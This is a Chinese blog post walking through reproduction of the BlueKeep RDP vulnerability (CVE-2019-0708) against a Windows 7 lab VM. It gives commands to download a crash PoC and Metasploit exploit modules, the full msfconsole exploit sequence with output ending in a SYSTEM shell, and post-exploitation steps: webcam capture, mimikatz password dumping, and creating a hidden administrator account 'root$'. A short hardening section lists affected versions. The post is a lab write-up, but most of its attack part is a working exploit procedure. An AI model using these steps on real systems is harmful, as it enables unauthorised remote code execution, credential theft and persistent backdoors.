漏洞复现:”CVE_2019_0708 BlueKeep”

环境篇

技术小贴
技术小贴
  • Windows7 ultimate sp1 x64
  • MSF

开启远程桌面:

image.png

关闭防火墙:

image.png

利用篇

早期蓝屏

这是早期漏洞利用POC!

git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
pip3 install impacket
python3 crashpoc.py 192.168.173.136 32  #python3 crashpoc.py ip地址 系统类型

漏洞复现:"CVE_2019_0708 BlueKeep"

注:以上POC,不需要关闭防火墙即可打穿WIN7

获取shell

下载攻击脚本:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

导入攻击脚本:

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

漏洞探测:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.173.136
set threads 5
run

[*] 192.168.173.136:3389  - Detected RDP on 192.168.173.136:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389  - The target is vulnerable.
[*] 192.168.173.136:3389  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

漏洞利用:

reload_all   #加载攻击脚本
search cve-2019-0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.173.130
set rport 3389
set target 3    #因为我们使用的是VMware,所以可以使用target 3
exploit

[*] Started reverse TCP handler on 192.168.173.1:4444
[*] 192.168.173.136:3389  - Detected RDP on 192.168.173.136:3389  (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.173.136:3389  - The target is vulnerable.
[*] 192.168.173.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 192.168.173.136:3389 - Surfing channels ...
[*] 192.168.173.136:3389 - Lobbing eggs ...
[*] 192.168.173.136:3389 - Forcing the USE of FREE'd object ...
[*] Command shell session 3 opened (192.168.173.1:4444 -> 192.168.173.136:49161) at 2019-09-14 22:50:31 +0800

session 1
session 1
'session' ڲⲿҲǿеij
ļ

C:Windowssystem32>whoami
whoami
nt authoritysystem
#成功拿到Shell,并且为System权限
#第一次explloit导致Win7蓝屏,之后正常获取Shell

target数值的说明:

  1. 根据指纹自动判断
  2. 真实机器
  3. Virtual Box虚拟机
  4. Vmware虚拟机

权限提升

meterpreter > getuid         #获取uid
meterpreter > screenshot     #截图
meterpreter > webcam_scream  #抓拍
meterpreter > load mimikatz  #获取系统密码
meterpreter > wdigest        #获取系统密码
rdesktop 192.168.173.138     #登录远程桌面

net user root$ root /add
net localgroup administrators root$ /add

本次实验机器为win7,windows server 2008需要修改注册表,否则会蓝屏。

[HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal ServerWinStationsRDP-TcpfDisableCam]值修改为0

加固篇

影响版本

Windows Server 2008 (R2)

Windows 7 SP1

Windows Server 2003

Windows XP

临时加固

  • 禁止掉3389远程端口

热补丁

参考:奇安信CVE-2019-0708漏洞热补丁工具使用手册

原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/bluekeep/

(1)
上一篇 2019年9月26日 下午5:26
下一篇 2019年9月26日 下午5:54

相关推荐

  • 关于BT服务器面板主题皮肤优化

    下面是 “关于宝塔服务器面板主题皮肤优化“ 的效果展示图,由娜云制作。小编只是转载。小编也希望大家用得开心,用得赏心悦目,以前那老土朴素的界面真的可以换一换皮肤了。 登陆界面 面板首页 文件管理 BTPanel 模板文件下载 使用方法: 1.解压覆盖到/www/server/panel/BTPanel/ 2.进入SSH,输入bt,选择9,清空面板缓存 3.清…

    2019年11月23日
    1.9K0
  • C语言

    基础 数据类型 C 中的类型可分为以下几种: 序号 类型与描述 1 基本类型: 它们是算术类型,包括两种类型:整数类型和浮点类型。 2 枚举类型: 它们也是算术类型,被用来定义在程序中只能赋予其一定的离散整数值的变量。 3 void 类型: 类型说明符 void 表明没有可用的值。 4 派生类型: 它们包括:指针类型、数组类型、结构类型、共用体类型和函数类型…

    2019年9月30日
    2.1K0
  • 国外VPS购买推荐帖子:RADWEBHOSTING

    国外VPS购买推荐帖子:RADWEBHOSTING,本方法由峰哥博客提供。工具:谷歌浏览器+谷歌浏览器上面的谷歌自动翻译。(谷歌翻译英文嘛,但博主英文好,是不需要翻译英文的,啊哈哈哈哈哈) 活动配置如下; 内存:1024MB Cpu:1 × 2.6GHz + 硬盘:20GB RAID 10 流量:1000GB IP:1个专用IPv4 IPV6:64 IPv6…

    2019年11月30日
    1.1K0
  • 关于博客站开源程序WordPress网站速度优化指导

    今天,小编来给大家说说 “关于WordPress博客类网站速度优化攻略”。希望对于用wordpress开源程序来建站的小伙伴有所帮助。 使用Wordpress搭建的网站普遍打开速度太慢,针于SEO来讲提升网站打开速度才能获得好的体验。如何提升Wordpress网站打开速度,让WP博客程序实现速度秒开,经过研究实践终于突破了速度这一难题。 要提升Wordpre…

    2019年12月15日
    1.9K0
  • Linux背景知识

    操作系统 体系结构 控制器:CPU,读取系统指令 运算器:CPU,运算 储存器:RAM(内部存储器:易失性存储器) 输入设备:输入数据 输出设备:显示命令执行结果 总线结构 地址总线:负责内存寻址 数据总线:负责传输数据 控制总线:负责控制指令 基本背景 前世 1969年,一群MIT BELL Lib 的家伙用汇编语言开发出一款收费操作系统:MULTICS …

    2019年9月30日
    1.7K0
  • 极路由3刷openwrt

    开启开发者模式 登陆路由器管理界面 进入智能插件,选择去往插件市场 点击上方的”路由器信息” 进入高级设置,并按提示开通即可! 成功后提示:登陆地址为192.168.199.1,端口为1022,密码为登陆密码! 这时可以使用MobaXterm等终端工具连接极路由3,进入Shell界面了。 固件下载 为了避免刷机出现问题无法恢复到原来的状态, 需要先刷入一个 …

    2019年9月30日
    4.9K0
  • 推荐一款网络推广营销拓客的软件

    这次,小编来给大家推荐一款网络推广营销拓客的软件。希望对做网站推广的小伙伴们有所帮助哦。 为各位互联网营销及SEO站长朋友们推荐一款《站长拓客营销神器》,苦苦寻找很久终于给开发出来了,为网络营销从业者朋友解决双手,让获客成本和流量变成更加高效。 什么是“无忧拓客营销” 软件名称:无忧拓客营销工具,名字是我自己起的,帮助网站长们快速挖掘行业流量网站,拓展网站流…

    2019年12月15日
    2.4K0
  • PSKHOSTING:国外黑色星期五主机空间1$一年

    外贸建站推荐 PSKHOSTING:国外黑色星期五主机空间1$一年 国外黑色星期五主机空间1$一年 5 GB共享主机(1$); 可绑定1个域名 2个数据库 5 GB储存空间 150 GB每月传输 无限的FTP帐户 1个电子邮件帐号 购买地址:https://clients.pskhosting.com/cart.php?a=add&pid=115 6…

    2019年11月30日
    1.9K0
  • Linux服务器VPS一键添加与删除Swap虚拟内存

    说明:很多人的VPS服务器由于内存太小,会导致很多进程被杀掉,这时候就需要我们添加Swap虚拟内存了,这里就整了个一键脚本方便懒人或小白使用。 脚本 提示:脚本不支持OpenVZ架构,安装会自动退出。 运行命令: wget https://www.moerats.com/usr/shell/swap.sh && bash swap.sh 然后…

    2019年11月16日
    2.7K0
  • 插件机器人椎名真白(博客通用版)

    这次小编来介绍另外一款插件机器人:“插件机器人椎名真白(博客通用版)”。大家一起动手,把自己的博客装饰得更好看,更有趣吧。 关于Live2d的插件机器人椎名真白 在原先的基础上加上了如下功能:1.可以基于图灵机器人的聊天功能(需要自己写接口,默认隐藏)。2.能够随意移动并记录位置(关闭浏览器后失效)。3.能够随意唤醒或者关闭并记录状态。4.自动判断浏览器是否…

    2020年2月11日
    2.7K1
  • 漏洞复现:”MS_17010 永恒之蓝”

    漏洞影响 2017年5月12日起,全球范围内爆发基于Windows网络共享协议进行攻击传播的蠕虫恶意代码,这是不法分子通过改造之前泄露的NSA黑客武器库中“永恒之蓝”攻击程序发起的网络攻击事件。 五个小时内,包括英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件,对重要数据造成严重损失。 目前…

    2019年9月26日
    2.7K0
  • 关于宝塔面板良心插件Nginx防火墙免费版

    有人在宝塔官方论坛发布了一款宝塔面板Nginx防火墙免费版。可以使用在centos、debian、ubuntu系统的宝塔面板里。使用逻辑基本和官方版一样(可以说基本相同)。不知道官方能让这个插件存活多久。 安装方式,宝塔面板7.0.2版本。找到软件商店 – 第三方应用 – Nginx防火墙免费版1.0。安装即可。 让我们来看看界面 看了以上界面,是不是感觉非…

    2019年11月15日
    1.4K0